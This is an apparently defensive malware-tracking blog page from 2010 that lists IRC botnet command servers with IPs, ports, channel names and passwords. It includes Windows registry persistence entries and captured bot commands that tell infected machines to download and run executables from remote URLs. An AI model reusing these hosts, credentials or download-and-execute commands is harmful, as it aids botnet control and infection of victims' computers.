Month: August 2010

irc.mypinktutu.info

Uncategorized

irc.mypinktutu.info DNS_TYPE_A 92.237.69.33 92.237.69.33:6667 Nick: {00-AUS-XP-PC-2510} Username: blaze Joined Channel: #cookie with Password cookie Process Created C:WINDOWSwoot.exe

leader.cegran.com(SnK 60k bots)

Uncategorized

leader.cegran.com DNS_TYPE_A 208.96.57.50 212.117.180.123 212.117.180.211 leader.cegran.com: 81 Nick Name: n[USA|XP]2144220 User Name: s Real Name: s Channel: Name: #newbin# Topic Deleted: :.st Name: #USA Password: (null) Private Message Deleted Value: :java!java@team PRIVMSG n[USA|XP]2144220 :.dl http://031919c.netsolhost.com/4531545.exe Value: :java!java@team PRIVMSG n[USA|XP]2144220 :.dl http://www.picsform.com/PHOTOS-465181569594697413-JPG.SCR

rQ1.up.aic.pa

Uncategorized

Remote Host Port Number 74.117.174.3 1863 NICK [l4M3r]pdmcl USER .fregj “” “lch” :fregj JOIN #lamers# l4mo PONG :rQ1.up.aic.pa Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-21CX1C643131} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-21CX1C643131}] + StubPath = “c:SYSTEMS-1-5-21-1482476501-1644491937-682003330-1013system32.exe” so that system32.exe runs every time Windows starts #Read more...

java.KUTLUFAMILY.COM

Uncategorized

java.KUTLUFAMILY.COM:81 channel:#ll channel:#xs Topic is ‘.flushdns |.down -S |.update -S |.update http://94.76.194.116/nnn.exe j1z7e7q7p1o4.exe j1z7e7q7p1o4’ Set by j on Sat Aug 14 01:12:52

67.159.63.120

Uncategorized

Remote Host Port Number 67.159.63.120 6667 NICK {New}[USA-1244024-XP] USER 3465765 “” “lol” :3465765 JOIN #vanadium Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Sp Services = “%Temp%spsrvs.exe” so that spsrvs.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Sp Services = “%Temp%spsrvs.exe” so that spsrvs.exe runs every time Windows starts MemoryRead more...

212.117.180.211(30 k bots)

Uncategorized

Remote Host Port Number 212.117.180.211 81 NICK n[USA|XP]8373890 USER s “” “lol” :s JOIN #newbin# PONG 422 JOIN #USA (null) * The following port was open in the system: Port Protocol Process 1053 TCP lmsn.exe (%AppData%lmsn.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows System Guard = “%AppData%lmsn.exe” so thatRead more...

mi67.three.co.lt

Uncategorized

Remote Host Port Number 74.117.174.99 32322 NICK wyhiwhkq JOIN #t4 l4m USER wyhiwhkq * 0 :COMPUTERNAME MODE wyhiwhkq +ix * The following port was open in the system: Port Protocol Process 1052 TCP Tolbars.exe (%Windir%WebTolbars.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + MSN = “%Windir%WebTolbars.exe” so that Tolbars.exe runs everyRead more...